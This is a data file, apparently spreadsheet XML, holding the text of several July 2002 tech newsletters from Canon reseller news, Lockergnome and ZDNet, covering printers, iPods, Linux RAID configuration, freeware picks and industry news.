    Widescreen iMac, iPod... er, that's it
        http://www.theregister.co.uk/content/39/26249.htmlBootnotes    Vulture Central welcomes new hatchling
    Bouncing baby boy joins nest
        http://www.theregister.co.uk/content/28/26232.html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</si>
  <si>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Buyers Alert Announce
* * * * * * * * SPECIAL ADVERTISER ANNOUNCEMENT * * * * * * * *Â Â July 18, 2002HP Postcard
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ | 
        Â Manage 
        My SubscriptionsÂ |Â FAQÂ | 
        Â Advertise
Home |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers
</t>
  </si>
  <si>
    <t>CNET AnnouncementÂ Â July 18, 2002Canon USA Reseller News : July
July 2002 / Volume 2 No. 5Â  
      The Canon USA Reseller NewsÂ provides resellers with monthly announcementsÂ on Canon products that are purchased through national distributors.
Â 
Â Scan the following topics for "News You Can Use."They're Here!
Check Out Our Q3 Promotions
Guess What's Coming to Distribution
Web-based Training Addition / We Have a Winner
Reseller Account Executive
Â Â 
They're Here!
Â 
Â 
Canon's N1000 and N2000 innovative Office Color Printers are here!  Orders are now being taken for these ... Super High Speed ... Super High Quality ... Large Volume printers!  With super low operating costs and excellent durability, these printers provide the solution to your customers' business color needs.
Providing our resellers with the tools necessary to be successful in the marketplace is important to us.  In an effort to help you jump-start your N1000 printer sales, we are making available, on a first come first served basis, HALF-PRICE N1000 DEMO units.  For your convenience, these units can be purchased at  Ingram Micro, Tech Data or D&amp;H.  There is a limit of one half-price unit per reseller - and supplies are limited - so order today!
To help you generate interest with your customers for the N1000/N2000, we have created a video banner ad that can be run on your website.  Log on to our  reseller website:  http://www.canonresellers.com to view the N1000/N2000 video banner ad.  You'll find the ad running on the Home Page.  To order a CD of this video banner ad for your use, contact your Canon Account Executive.Â Â 
Check Out Our Q3 Promotions
Â 
ProductInstant Rebate*
Timeframe
imageCLASS 1100
$100
Through September 30, 2002Â 
*All rebates will be reflected on the distributor invoice price at the time of purchase.
Quarterly Performance/Growth Bonus
It's a new quarter and a fresh opportunity to become a Canon Premier Partner.  Our quarterly growth goals are within reach!  Your purchases of all eligible hardware* between July 1, 2002 and September 30, 2002 work toward your Premier Partner status.  Following are the rebate categories:
            $50,000-$99,000 = 4% rebate
      $100,000+ = 6% rebate      Claim forms for submitting your claims are available from your Canon reseller Account Executive and at www.canonresellers.com.*Only hardware is eligible - DR-3060, DR-3080C, DR-5020, DR-5080C, DR-4580U, DR-4080U, N1000/N2000 Office Color Printers, imageCLASS 2200 and imageCLASS 1100.  CarePAKS, consumables, maintenance kits and media are not eligible.      Click on  www.canonresellers.com, to find your tools for success! 
      Â 
Â 
Guess What's Coming to Distribution
Â 
Â Here's a clue:  Canon is known 'far and wide' for its products.  Coming soonâ€”at a distributor near you - we'll show you just how 'wide' our products can be.  Watch for another clue in our August newsletter!
Â Â 
Web Based Training Addition / We Have a Winner
Â 
Â 
As promised, we're about to launch another web training course.  Final touches are being made on Canon's N1000/N2000 web training course.  This creative and informative course - covering topics that include  Features, Installation, Connectivity and Markets - is not to be missed.  Details to follow.      We have a winner!  Congratulations to everyone who completed the imageCLASS 1100 web training before June 30!  The winning name was randomly selected from a 'hat' and we're pleased to announce the winner of the Canon PowerShot A20 digital camera works at one of our valued resellers in North Carolina!Â 
Â 
Although the contest is over... the learning should not stop.  If you have not yet completed this informative imageCLASS 1100 training course, log on to http://www.canonresellers.com right click on Simon and go to the training site. 
Â Â 
Reseller Account Executiveâ€”Contact Changes
Â 
Â 
Canon has a dedicated team of Account Executives whose mission is to work with you to achieve our mutual business goals.      Check the list below and note the name and e-mail address of the Account Executive assigned to your state.  Be sure to contact your Account Executive for support with the following:Â 
Â N1000/N2000 Video Banner Ad
Events (Open Houses/Shows)
Sales Support Collateral
Discounted Demo UnitsEnd User Sales Calls
Demand Generation
Product Training
BidsÂ 
Â 
Account 
		Executives are listed below with the states that they cover.Â Â 
Northeast
John 
      Brogan 
(jbrogan@cusa.canon.com)
Â 
Â 
Connecticut
Maine 
New Hampshire
Rhode Island
Â 
Â 
Massachusetts
New York
New Jersey
Vermont
Â 
Â 
Â 
Â 
Mid Atlantic
Greg Harzenski
(gharzenski@cusa.canon.com)
Â 
Â 
Delaware
Maryland
Washington D.C.
Â 
Â 
Â 
Â 
Â 
Midwest
Jennifer Mickeletto 
(zzzickeletto@cusa.canon.com)
Â 
Â 
Indiana
Kansas
Missouri
Ohio
Â 
Â 
Colorado
Kentucky
Nebraska
Tennessee
Â 
Â 
Â 
Â 
Mid North
Chad Crump
(ccrump@cusa.canon.com)
Â 
Â 
Alaska
Illinois
Minnesota
Washington
Â 
Â 
Idaho
Montana
North Dakota
Wisconsin
Â 
Â 
Iowa
Michigan
South Dakota
Wyoming
Â 
Â Â 
Â 
Â 
South
Randal Kendrix 
(rkendrix@cusa.canon.com)
Â 
Â 
Arkansas
Mississippi
Oklahoma
Utah
Â 
Â 
Louisiana
New Mexico
Texas
Â 
Â 
Â 
Â 
Â 
Southeast
Carmen DiMartino 
(cdimartino@cusa.canon.com)Â 
Â 
Alabama
North Carolina
Puerto Rico
West Virginia
Â 
Â 
Florida
South Carolina
Virginia
Â 
Â 
Â 
Georgia
Pennsylvania
Virgin IslandsÂ 
Â 
Â 
Â 
Southwest
Heath Tagtmeyer 
(htagtmeyer@cusa.canon.com)
Â 
Â 
Arizona
Hawaii
OregonÂ 
Â 
California
Nevada
Â 
Â 
Â 
Â     If you wish to opt out of receiving future e-mail blasts, please click here. If you would like additional recipients to receive our monthly communications, send additional names and e-mail addresses to canonresellers@cits.canon.com.
    Â 
Â 
Â 
Â 
Â 
Â 
Â 
The e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |Â Manage My Subscriptions
Â |Â FAQ
Â |Â AdvertisePrice comparisons | 
Product reviews | 
Tech news |
Downloads | 
All CNET services
.</t>
  </si>
  <si>
    <t>&lt;!--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20020717 Lockergnome Digital Media
Â 07.17.2002 MediaREPORT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This is of course belated, as I'm sending it on the 18th, but Happy Birthday to Lori!One thing about MacWorld should excite mp3 junkies -- the iPod just got 
even bigger, with a 20GB version and Apple officially endorses Windows 
compatibility. Actually, the good news is, the 5GB and 10GB versions 
came down in price. Hearing that the only "officially" functional 
Windows player is MusicMatch Jukebox Plus is a serious downer, in my 
opinion. Sure, MusicMatch is a decent player, but with plenty of great 
free players on the market, why do we want to purchase a software 
player in addition to the $299+ hardware unit?At first glance, it looks like Apple is only paying lipservice to true 
Windows compatibility. I've seen no mention of any additional 
functionality, besides song management via one media playing utility. Mediafour's 
XPlay remains a 
better option, in my opinion. In addition to allowing you to use an 
iPod with almost any media player made for Windows, it assists with 
contact management, via Outlook vCards, in addition to making the 
iPod an additional drive on your PC. At a mere $10 more than MusicMatch 
Jukebox Plus, XPlay blows the doors off Apple's officially endorsed player.Lori and I made the five and a half hour drive to St. Louis for this year's 
SIC without a hitch. I just missed a 
face-to-face introduction to John Lal, of 
winferno.com, although I'm sure 
we'll meet tomorrow. John's the guy behind the 
free copy of Research-Desk 
for all Gnomedex attendees. Shortly after arrival, I enjoyed dinner with 
the eSellerate gang, with a 
discussion about GnomeTomes and 
what the future holds.Every time I travel, I'm reminded just how slow dialup really is. Fortunately, my 
Crosspaths.net connection allows me 
to send mail via my Lockergnome account, unlike most of the national dialup 
services. Crosspaths is technically an Iowa ISP, although the have points of 
presence in almost every major city in the country. If you're a dialup user, 
you may want to take a look at their offerings, regardless of where you live. Lori 
has used their DSL service for two years now, and they've been nothing short of 
outstanding in dealing with customer service queries. 
Jake LudingtonÂ Â Â Â Â Â Â Â Â GnomePRODUCER
PNG Files Do Not Show Transparency in Internet Explorer (Q294714)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q294714This originally appeared in last weeks Webmaster Weekly, but due to its graphical nature, its worth inclusion here as well:"If you browse to a Web page that contains an image that has a transparent 
background in Portable Network Graphics (PNG) format, the image background 
may appear to be gray rather than transparent."Fortunately, Microsoft explains a solution for this problem. Personally, I 
haven't encountered this PNG display error, but for those of you 
simplementing PNGs on your sites, you'll want to review the solution.
Â GnomeFEATURE
Glitschka.com
http://www.glitschka.comFlash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The entertainment is accessible accross both Windows and Mac 
platforms, with icons available in both Mac and PC versions.
  Â GnomeSKIN
Skin 2 for Winamp 3.x by nnicPosted on  7/17/02 10:43PM  -- Â Â  
[Download]Â --Â [Zoom]
Â --Â [Visit DeskMod]
Get your copy of SkinStudio XPÂ GnomeAUDIO
Fight Cloud
http://www.fightcloud.com
Unknown artists across a variety of genres offer free mp3 downloads of 
selected tracks, with an option to purchase songs on CD for the price 
of shipping and handling. All CDs are professionally mastered works, 
so you're getting label quality releases, without the jacked-up retail 
price tag. The mp3s let you decide if the album is worth you $4.95. 
The only thing I find odd about this site is their proclamation of 
paying artists 50% of distribution profits, which I have to assume is 
50% of zero, since the CDs are free. The artist selection contains 
some solid releases by talented artists, regardless.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Â GnomePLUGIN
BBE Sonic Maximizer [3.22MB] W9X/W2K/XP $129
http://www.bbesound.com/products/maxim/directxplugin.aspFrom home recordings to downloaded mp3s, this DirectX plug-in brings back 
the clarity to your audio files. Bring back the live feel that gets lost 
in the recording process, add depth to bass lines, and bring vocals to 
the front of your audio mix where they belong. Compensate for frequency 
phase shifting, giving your audio a kick in the pants. This is one post 
production tool you need in your digital arsenal. Also available as a VST 
for Mac OS.
Â GnomeDVD
Click for DetailsWho's Afraid of Virginia Woolf? (NR) 1966
Adapted Play - 131min
Reviewer's Tilt (10)
 Before directing Catch-22 and The Graduate, Mike Nichols made his big screen debut directing this adroit adaptation of Edward Albee's play "Who's afraid of Virginia Woolf?"  Nominated for thirteen, and winner of five, Academy Awards, this dark tale centers on history professor George (Richard Burton), and his wife Martha (Elizabeth Taylor), daughter of the college president.  At first George and Martha appear to be the average Ozzie and Harriet, an aging, well-adjusted, educated couple, comfortable with their lives and their love.  George and Martha quickly shatter this illusion, as they return from a faculty cocktail party, to exchange a caustic barrage of verbal barbs.  Just as quickly, however, the couple turns witty and civil when the young new biology professor Nick (George Segal) and his shy, but pretty wife Honey (Sandy Dennis) stop by for a nightcap. Unfortunately for Nick and Honey, the sardonic exchange does not disappear, it merely changed guise.  Soon Nick and Honey find themselves helpless pawns in the elder couple's sick-witted exchange.  Throughout the remainder of the movie, George and Martha dance their finely choreographed, oft-rehearsed dance of despise. The two alternate the lead, alternately dishing out and enabling the abuse, but they never miss a step.  Thankfully, writer Albee's sublime play translates to the big screen almost unadulterated. Taylor and Burton deliver his lines with great force and impeccable timing.  At one point George proposes "Now that we're through with Humiliate the Host...and we don't want to play Hump the Hostess yet...how about a little round of Get the Guests?"  This provides some idea of the precarious twist of uncomfortable wit that drives the action from start to finish. Albee's stellar writing notwithstanding, the real star of this film is Taylor and Burton's alchemy, converting Albee's words into cinematic gold.  Ok, I will grant you that playing a pair of aging, drunk, selfish lovers may not have been much of a stretch.  Both actors, however, deliver their lines with the chilling reality of a serial killer describing his most gratifying slaying.  Often unpleasant and disturbing, this film never allows you to relax or look away.   Simultaneously seamlessly smooth, and ingeniously rocky this is not a "feel good" movie. "Who's Afraid of Virginia Woolf?" is, however, a memorable film that will stick with you for years to come. 
Region 1 Encoding (US and Canada only)
Format: Black and White, Widescreen Anamorphic, Closed Captioned
Sound: (Dolby Digital 5.1)
Production NotesReview by Brett TroutÂ GnomeWALLPAPER
purple flower for WallPapers by tatoshPosted on 7/17/2002 12:35:01 AM  -- Â Â  [Download]
Â --Â [Zoom]
Â --Â [Visit WinCustomize]
http://www.lockergnome.com/issues/digitalmedia/20020717.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.
LOCKERGNOME
Â Geekathon 2002Â Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin Shell
Â Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio ShowÂ The GnomeSHOPPERÂ Microsoft Office Tips
Â PC Productivity Tips
Â Cool Internet Tips
Â Windows 2000 Tips
Â Windows XP Tips
Â Top 50 Fun Sites
Â Must-Know Tech Terms
Â Top 50 Useful Sites
Â Top 75 Tech Sites
Â Top 50 PenguinCORE
Â Top 50 PenguinTWEAKS
Â Recommend Us!
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The Webcams
Â Computer Power UserÂ Submit Your Opinion
Â Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Get Chris's BookÂ General Feedback
Â E-mail the Editor
Â Jake's BlogÂ Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To LockergnomeCLICK HERE TO ZOOMÂ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GNOMEMUSICColdplay Takes a Bigger BiteIf you miss Coldplay's quick little club tour this August, don't worry, youï¿½ll get a second chance to see them in...
Dave Matthews Gives Us 'Busted Stuff'The Dave Matthews Band is breaking things up with their new album Busted Stuff; it hit stores shelves yesterday. The...
Strokes Leave Weezer HangingStrokes fans who are heading to the Weezer tour to catch the Strokes opening will be disappointed. The Strokes were...
Jaz-O Sez Jay-Z is a FraudThe rap between rappers Jaz-O and Jay-Z is nothin but diss...otherwise known as a falling out. Jaz-O was Jay-Z's...
Booze, Drugs in Aaliyah's PilotThe pilot who was at the controls of a small plane that crashed and killed singer and actress Aaliyah had cocaine...
McGraw's Uncle Charged With MurderCountry singer Tim McGraw's uncle has been charged with shooting and killing a neighbor in Vallejo, California. One... Â 
GNOMECREDITSÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
Â Â Search Past Issues:
Â </t>
  </si>
  <si>
    <t xml:space="preserve">
ZDNet AnchorDesk NewsletterTHURSDAY, JULY 18, 2002
Why we're changing our publishing schedule
Dear Reader,As of Monday, July 15, AnchorDesk is being published on Mondays, Wednesdays, and Fridays, instead of five days a week. The AnchorDesk Weekly newsletter will continued to be published every FridayWhy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you.Having additional time also means I will be able to work on several projects I've been assigned, including one that could bear fruit at the Consumer Electronics Show next January. More about that soon, once all the details are nailed down.For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there.Sincerely,
David Coursey
Executive Editor
AnchorDesk
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ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</si>
  <si>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Tech Update TodayVITAL SIGNS FOR JULY 18, 2002Dan Farber
Gaga for Google? When results don't countWhen my Web search on a leading IT exec came up almost empty, what was I to think? As it turns out, the lack of Web tracks is not necessarily a sign of irrelevance.And it offers a lesson or twoLatest from ZDNet News
Unisys servers shape up for Itanium 2
Linux to enter supercomputing top five
U.S. wants your mailman to snoop on you
Motorola: Gloomier outlook for handsets
Yahoo Mail swaps out JavaScript words
TI boosts Sun's UltraSparc chip
PC slump drives AMD deeper into the red More Enterprise News
David's PicksDavidBerlindGroup proposes PC protection guaranteesSeveral U.S. government agencies have teamed with an international Internet security organization to support a set of 
benchmarks aimed at guaranteeing a minimum security standard for computers. While Windows 2000 workstations are 
the first benchmark that the disparate organizations have agreed upon, others to  follow include Cisco IOS for 
routers, Solaris, Linux and HP-UX. Reaching agreement on these benchmarks will not be a walk in the park.Read the full story
Microsoft squashes Windows 2000 bugsAs the rhetoric turnsLast year, Steve Ballmer called the GPL on which Linux is based a "cancer." This year, Linux is a "unique 
competititor." The emergence of Linux as a serious competitor to Windows has forced Microsoft to change the way it 
approaches customers, Microsoft's CEO acknowledged at this week's Fusion 2002. Microsoft traditionally has played its "low price, high volume" game against IBM, Oracle and others. Now it must figure out how to beat Linux, which has an even lower cost -- free.Read the full storyWi-Fi can waitThe next iteration of Wi-Fi (aka 802.11a) may be getting a lot of interest, but rolling it out now, says Gartner, would be jumping 
the gun. The anointed successor to the 802.11b modulation scheme provides up to five times the throughput over its predecessor. When will it be ready for prime time?Find out why you should wait
'Rainbow' coalition to spread wireless
More large-scale worm attacks? Brace yourself
It's been a year since the Code Red worm wreaked havoc on the Net. What's changed? Internet worms have become much 
more robust since Code Red. And that doesn't bode well, since antivirus software hasn't kept up with all the changes. So 
far in 2002, we've been lucky. Robert Vamosi tells you how to prepare for future threats.
Here's what he recommends
Macworld hears roar of JaguarAt this week's Macworld, Apple CEO Steve Jobs heralded the early arrival (August 24) of Mac OS X version 10.2 
(code-named Jaguar), which features improved search features plus QuickTime 6 with support for MPEG-4. Also: An iPod 
for Windows, a 17-inch flat-panel iMac, new charges for iTools Web services and a leg-up for Mac Office.Read the full report
What David Coursey wants from Macworld
Write me at david.berlind@cnet.com
Back to topAlso on Tech Update Today
COMMENTARYÂ Fact and fiction in the Web services debateIona Technologies CEO Barry Morris says the battle between .Net and Java isn't important. Web services' future is held 
hostage by an unresolved debate over industry standards.
 DOWNLOADSÂ Gather Net information
Conduct Ping, Traceroute, Finger, and Whois queries, as well as gather extensive IP information with this handy kit of 
network tools.
PREVIOUSLY ON TECH UPDATE TODAYÂ Software contracts: Clause for alarm
Be wary of fine print. Learn to spot red flags in corporate software contracts before you sign on the dotted line. 
Crucial Clicks--products worth looking at
MONITORSA Porsche you can afford
Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.Read reviewMost Popular ProductsMonitors
1. Samsung SyncMaster 151S
2. NEC MultiSync 1550V
3. Envision EN-5100e
4. Samsung SyncMaster 570 V
5. Samsung SyncMaster 955 DF
More popular monitors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</si>
  <si>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20020716 Lockergnome Penguin ShellÂ  07.16.2002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today!I've got a few quick Lockergnome-related notes for you today.First, we'd really like to see you in August. I know that Jake, Chris and Randy have been signing off on their newsletters with those few words, and I'll join them. If you didn't experience Gnomedex last year, you missed, in the words of many industry insiders, "The show of the year." It was unlike any other computer conference I've ever attended. Unlike any conference I've attended, period, computer-related or not. While most such conferences are a huge hustle and hassle, Gnomedex was what computing and Lockergnome are all about - sharing useful information, gathering with like-minded enthusiasts, and learning to use your chosen computer to the fullest extent. No hustle. No hassle. No BS. For the minimal cost of registration, it would be hard to find a better weekend for geeks and wannabes alike. Add to that the schedule of luminaries presenting and attending and you've got the best deal on the planet for computer users. It's hard to believe we're less than a month away - I really do hope to see you there.Another Lockergnome innovation has hit the newsstands - err, bookstores. That's right. Jake has release a FREE GnomeTome on "Converting Vinyl LPs to CD." Who'd have thought there were so many of you out there that are, well, my age and still in possession of those black slabs of aural heaven. I don't know if Jake's just lost his mind, or what, but free? Get outta here. Go ahead - "Gnome" our servers. Get you copy while you can. And while you're there, check out some of the other killer e-tip books in the GnomeTomes collection.Have a great Tuesday.
Tony
Steidler-DennisonÂ Â Â Â Â Â Â Â GnomeTWEAK
Lockergnome readers, SAVE 50% on the Computing Encyclopedia!
Are you looking for the ultimate computing resource? Discover the
Computing Encyclopedia from Smart Computing.  Regular price $59,
SPECIAL OFFER for Lockergnome readers,
get your set TODAY, ONLY $29.95!Setting the Home Page in KonquerorKonqueror, while a great browser, has taken a step in the direction of IE. Like IE, Konqueror is really an integrated web and file browser. You can use it equally well to view web pages and files on your system. It's been something of a hot debate whether this is actually the proper use of a browser. In fact, Galeon was written specifically to answer this question - it's a web browser and a web broswer only.Regardless, it can be a bit annoying to punch the Home button on the Konqueror browser and end up in your /home/user directory. Have no fear, though. It's an easy change to make your actual web home page the home page in Konqueror.Open Konqueror and select Settings from the toolbar. Select "Configure Konqueror," and leave the default selection of "File Manager" as is. In the text box on the right half of the screen, you'll see a tilde in the "Home URL" text box. That just tells Konqueror to use the user's home directory as the home URL. Changing this to a web address will set that address as your home page. Select OK to close the window.Taking it one step further, click on the Home button in your Konqueror browser to open your newly-configured web home page. Then, select "Window" and "Save View Profile, 'Web Browsing.'" This will futher save the URL and allow your the opportunity to save the window size when the browser opens.Konqueror is more than just a web browser. But, it's not so tough to make it act like a pure web browser if you just know where to look.
Recommend It!
Send us a GnomeTWEAKÂ GnomeCORE
Kernel Configuration - Part XIIDepending on who you talk to, RAID can stand for "Redundant Array of Independent Discs" or "Redundant Array of Inexpensive Discs." No matter. They both point to the same theory and practice in Linux; data storage redundancy. That's today's kernel configuration section - Multi-Device Support.Let's talk first about the principles behind a RAID setup. RAID uses multiple discs for speed, increased data storage, or data redundancy. Fundamentally, there are 5 levels of RAID in Linux; Linear, RAID-0, RAID-1, RAID-4, and RAID-5.Linear RAID uses two or more discs, appending data from one to another. In other words, when disc 1 is full, disc 2 steps in to store data. There is no redundancy in Linear RAID - only an increase in storage capacity. Further, there's no marked increase in data access speed because you're accessing one drive in the RAID array at a time.RAID-0 "stripes" data across the RAID drives. Some data will be written to the first drive, some to the second, etc. Like Linear RAID, RAID-0 provides no redundancy. Because the data has been written in parallel across the drives, not all data exists on all drives. Lose a drive and your data is gone. RAID-0 will, however, decrease data access time. Your system will run more quickly.RAID-1, unlike Linear and RAID-0, does provide data redundancy. This is the first level in which data is "mirrored" across the drives in the RAID array. All data that exists on one drive exists on all the others. RAID-1 requires at least two drives and they should be of equal size, otherwise, your overall RAID array will be the size of the smallest drive. Performance with RAID-1 can actually be slower than with a single drive or RAID-0, as all the data is written across multiple discs.RAID-4 is, for the most part, pretty useless. It reserves one disc for parity information while striping the data across the others. This is much like Linear mode, with an additional disc thrown in for parity data. Parity data can be used to reconstruct and retrieve the data on the other drives, but this really isn't a redundant method of data storage. Consequently, RAID-4 is probably the least used of the RAID schemes.RAID-5 is designed for 3 or more discs and provides both redundancy and speed. Like RAID-4, RAID-5 pays close attention to parity data. However, rather than reserving a device in the RAID array for this data, it's written across the array. Because the parity data is written across the array, data recovery can be accomplished fairly quickly. In fact, using a "spare disc" configuration will allow RAID-5 to reconstruct the data to the spare disc immediately after the failure of a drive. Because of it's increased speed and redundancy, RAID-5 is probably the most common setup for multiple storage devices.With all that in mind, you'll need to make a choice in your kernel configuration. Do you have mutliple drives of the same size that you'd like to configure as a RAID array? The Multi-Device Support section of the kernel configuration will allow you to do this. In fact, you'll be able to set the RAID level, as well. Again, evaluate your needs and select the appropriate option.Tomorrow, it's on to networking options in your kernel configuration.
Recommend It!
Send us a GnomeCORE tipÂ GnomeFILE
SaveMyModemhttp://web.genie.it/utenti/g/gareuselesinge/smm/"SaveMyModem is an anti-spam, mail-shaping, and delete-on-server mail tool. It is designed for users with slow dialup connections, who are tired of downloading large amounts of spam and worm and virus attachments."
Recommend It!
Send us a GnomeFILE suggestionÂ GnomeVOICE
Windows Apps in Linux?
Scribbled by Robert Nix"Nice coverage but I don't give a flip about Office. OpenOffice is fine
for my needs."What I really want is to run Quicken (at least v.2001) which is the only
app keeping me running Windows (using vmware). I've tried Quicken on Mac
OS X and it is grossly inadequate and on Linux with Wine and have so far
been unsuccessful even using tips from
http://appdb.codeweavers.com/appview.php?appId=107. I hope that GnuCash
will eventually support the online features I enjoy but that doesn't
help now."The reason I'm writing this is that I personally think Office products
are overrated for home users, at least now that there are several native
alternatives. For home users, finance apps are the key issue now. Do a
section on getting Quicken to run in Wine and I'll declare you a god. :)"
Recommend It!
Speak your GnomeVOICEÂ GnomeCLICK
Important Unix Manpages
http://home.ins.de/~m.hussmann/man/Manpages are an important part of Linux use. Armed with the proper knowledge and manpage, there are few sticky situations in Linux that can't be solved quickly. Though they can be a bit cryptic at times, manpages are really a Linux newbie's best friend.Important Unix Manpages is a compilation of help for situations that actually have little to do with programming. They're more human interface problems than machine interface problems. This page just points out that if life was like Linux, we'd all be a lot happier.
Recommend It!
Suggest a GnomeCLICKhttp://www.lockergnome.com/issues/penguinshell/20020716.html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Win a Digital Camera
Â General Feedback
Â Chris's Blog
Â E-mail the Editor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</si>
  <si>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20020718 Lockergnome Windows Daily
Â  07.18.2002 GnomeREPORT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I don't go to many concerts, but that doesn't mean I don't
appreciate listening to good
music at every waking moment. Tonight, a handful of Bay
Gnomies and I watched They Might Be Giants rock the Fillmore.
Melanie, Steve, Brent, Missy, Robert, Patrick, Gretchen, Matt, and
Mindy had a total blast. Well, it wasn't much fun when Robert got
his digital camera confiscated - but this was a show worthy of
five megapixels
(believe me)! Brent went to
the show last night, and I saw them play on the set earlier this
afternoon. They were selling a new CD (which had JUST been
released the other day); "They Got Lost" is full of a few
previously-unavailable tracks. If you aren't sure about purchasing
it outright, I strongly urge you to sign up for a trial EMusic account and download
a few of their songs in MP3 format. Oh, and check out the opening
act: Noe Venable. She's got
a few free MP3s on
her site, too. Give "Boots" a shot - very nice.Does anybody know how to set a binary clock? Melanie got it for me
as a gift (which was a very nice gesture). Sure, I could read the
manual - but the ones and zeros start to look eerily similar after
flipping past the first page. You know me: I'm not much of a math
guy. In fact, I just discovered the other day that 'byte' was
short for 'by eight' (even though I already knew that 'bit'
represented 'binary digit'). I'd stick with a digital timepiece,
but it just isn't geeky enough for me anymore. How sad is that?
I'm ready to walk on the wild side. Maybe I'll get my laptop
pierced tomorrow? It could happen. I've been known to do nutty
things on a moment's notice, like changing my default Web browser.
Courtesy of Asa
Dotzler, I have an official Mozilla sticker, CD, and t-shirt
(which you saw me model in my Webcam the other day). Don't be too
jealous; Mozilla.org has
plenty of goodies to go around.Looks as though Jake
and Lori are already having a blast in St. Louis.
They're at the Shareware Industry Conference, along with hundreds
of well-known program programmers - the people who make our
computers work the way we want them to work! We're doing our best
to convince them to join us at Gnomedex. They ask: "Who else
is going to be there?" We answer: "People who don't know you yet."
They ask: "Then why should I come?" We answer: "Because it's a
business opportunity for you." They ask: "What if I don't want to
learn anything or meet anybody?" We answer: "We can't really help
you there, but here - have lunch on us." They ask: "Oh, the
admission price includes food at at Gnomedex?" We answer: "We
cannot provide every meal, but you won't go hungry." They ask:
"So, why Des Moines, when there's nothing to do there." We answer:
"You're 100% wrong. There *IS* something to do there: Gnomedex."
Get it? Got it? Good.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADSLatest Downloads
VisiTrax Lite 2.91
mp3DirectCut 1.23
Cpick 2.6
Image Browser 4.4
EZ JavaScript 1.1
WinHTTrack 3.20RC5
Panda Quick Rem 3.2.1.0
EZBack-it-up 1.1
ArtSee 1.0
Soliton 2
Fresh Download 4.30GigAlarm v1.201 [33k] W9x/2k/XP FREEhttp://users.bigpond.net.au/glina/GigAlarm.htm{String on your finger} Sometimes, I'm a bit like the absent-minded professor... I would forget my own head if it wasn't attached. So naturally, I appreciate any program that can help keep me on track, and with GigAlarm I can setup whatever reminders/alarms I need. However, sometimes a simple text message just won't catch my attention. Well, herein lies the beauty of GigAlarm... it doesn't just have to give you a text alarm! GigAlarm can play a WAV file (random, or your selection), change your background, start a program, or use one of the many Windows shutdown options. My wife has gotten in the habit of using the Shutdown option as an alarm to signal that I have spent too long on the computer. (Lucky for me, there is a snooze button!) NOTE: The author says, "This program is essentially free to use for non-profit purposes... If you find this program useful I would appreciate $10 AUD (or $5 USD) as a token of your appreciation."Context Thumbview v1.0.b1 [107k] W9x/2K/XP FREEhttp://contextmagic.netfirms.com/image-viewer/{Peep show} I'm not always very patient, especially when it comes to my computer. Double-clicking on an image and waiting for it to come up in my image viewer is almost too much for me to handle. Lucky for me, Context Thumbview has made its way onto my system and I no longer have to wait to view an image. All I do now is right-click the image, choose "View Thumbnail," and there is the image, out there for me to see... all without me having to open up any programs! "As Express ThumbView is an Explorer extension, it is always ready and available for use. Moreover, it is available in any Explorer window, including Open and Save As... dialog boxes." As an added bonus, with Context Thumbview installed on my system, I can also turn off the thumbnail view if I want to save system resources.
Recommend It!
Â GnomeCLICKS
Â GnomeSYSTEM
Starter v5.5.4.2175 [423k] W9x/2k/XP FREEhttp://codestuff.tripod.com/{Startup manager} This application bills itself as "Yet Another Startup Manager"... I don't think so! Starter isn't JUST another Startup Manager, it's a piece of programming art. One of my biggest problems with Windows Task Manager is that I don't know what all the processes on my machine are, or from where they are running. Starter not only gives me that information, but it also lets me save it as an HTML file. In addition, Starter lets me import and export registry keys or add a new task to be processed. Don't run all over your machine trying to find all the programs you need to control your PC, when you can do it all (and more!) with Starter.Recommend It!
Â GnomeWILDCARD
Aversoft Sticker v3.55 [592k] W9x/2k/XP US$15
    Unearthed by Sergei Lepyokhinhttp://www.aversoft.com/sticker/{Sticky notes} Did you know that Post-it(r) Notes were invented by accident? I use to have these notes all over my monitor. Now my screen is clean as a whistle! Aversoft Sticker is a program to help you remember "important information by displaying skinnable sticky notes on your Windows desktop." No more bland notes for me! With Sticker, I am surrounded with pictures of paradise (downloaded from Aversoft's website). These great features are no accident. Sticker also has a transparency feature that makes the notes only half visible, making it much easier to use while working on your other programs. Don't walk away yet though... Sticker also allows you to print your notes, lock them from accidentally being deleted, and set an alarm (repeating or one-time). Speaking of alarms, mine just went off and opened up Outlook. Time to send out today's newsletter!Submit Your Thoughts | Recommend It!
Â GnomeFAVORITECAREER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  Wikipedia Encyclopediahttp://www.wikipedia.com/{We is smart} Those Saturday morning folks at ABC were right: it's great to learn, 'cause knowledge is power. I highly encourage everyone to learn something new each day, and with Wikipedia.com you can! Wikipedia is a free, and very thorough online encyclopedia; you'll be hard-pressed to stump this information tool with an undocumented topic. Know what you're looking for? Then just use the search tool. In the mood to fill your cranium with a few new thought processes? Just browse through any one of Wikipedia's many categories until you find a subject that piques your interest. From Physics to Opera; from Anthropology to Cooking, you will find it all here. Now, all that is missing is you! Take a look and beef up your gray matter.
Recommend It!
